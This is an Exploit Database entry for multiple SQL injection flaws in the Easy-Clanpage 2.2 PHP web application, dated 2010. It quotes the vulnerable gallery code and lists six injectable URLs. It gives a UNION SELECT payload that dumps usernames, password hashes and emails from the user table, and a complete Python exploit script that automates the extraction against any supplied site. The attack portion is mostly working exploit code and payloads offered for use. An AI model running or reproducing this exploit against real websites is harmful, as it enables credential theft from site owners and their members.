Easy-Clanpage 2.2 – Multiple SQL Injections /

• Exploit Database
• 128 阅读

• 作者： Easy Laster
  日期： 2010-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11980/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116

  ----------------------------Information------------------------------------------------ +Name : Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit +Autor : Easy Laster +Date : 31.03.2010 +Script: Easy-Clanpage <= v2.2 +Download : Update Version 2.1->2.2 http://www.easy-clanpage.de /?section=downloads&action=viewdl&id=18 +Price : for free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101..   --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_| |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_| |___| |___|     ---------------------------------------------------------------------------------------- +Vulnerability PHP Code   -#######################################################################################- IF(isset($_GET[&apos;action&apos;])) { switch($_GET[&apos;action&apos;]) { case "viewpic": gallery_show_pic($_GET[&apos;id&apos;]); break; case "gallery": gallery_show_gallery($_GET[&apos;id&apos;]); break; case "kate": gallery_show_kate($_GET[&apos;id&apos;]); break; case "comments": gallery_show_pic((int)$_GET[&apos;id&apos;]); break; case "commentsadd": write_comment(&apos;gallery&apos;, (int)$_GET[&apos;id&apos;], ALLOW_ANONYM, SPAM_NEWS_COMMENT , LIMIT_COMMENTS); break; case "commentsquote": write_comment_qoute(&apos;gallery&apos;, (int)$_GET[&apos;id&apos;],(int)$_GET[&apos;quote&apos;]); break; case "commentsedit": comments_edit(&apos;gallery&apos;, (int)$_GET[&apos;subid&apos;], (int)$_GET[&apos;id&apos;], LIMIT_COMMENTS); break; default: gallery(); } -#######################################################################################-   +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=viewpic&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=kate&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=comments&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsquote&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsedit&id=   +SQL Injection +Exploitable : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id= -1111111111+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+ecp_user +where+userID=1--+   -----------------------------------------------------------------------------------------   #Exploit #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, re   if len(sys.argv) < 2: print "***************************************************************" print "*************** Easy-Clanpage v2.2 Gallery Hack ***************" print "***************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* Easy-Clanpage <= v2.2 SQL Injection Exploit *" print "*coded by Dr.ChAoS*" print "* *" print "* Usage:*" print "* python exploit.py http://site.de/ecp/ <userid, default=1> *" print "* *" print "***************************************************************" exit()   if len(sys.argv) < 3: id = 1 else: id = sys.argv[2]   site = sys.argv[1] if site[-1:] != "/": site += "/"   url = site + "index.php?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,username,0x3a,password,0x3a,email,0x23,0x23,0x23,0x23,0x23),4+from+ecp_user+where+userID=" + str(id) + "--"   print "Exploiting..."   html = urllib2.urlopen(url).read() # I hate regex! data = re.findall(r"#####(.*)\:([0-9a-fA-F]{32})\:(.*)#####", html) if len(data) > 0: print "Success!\n" print "ID: " + str(id) print "Username: " + data[0][0] print "Password: " + data[0][1] print "E-Mail: " + data[0][2] print "\nHave a nice day!" else: print "Exploit failed..."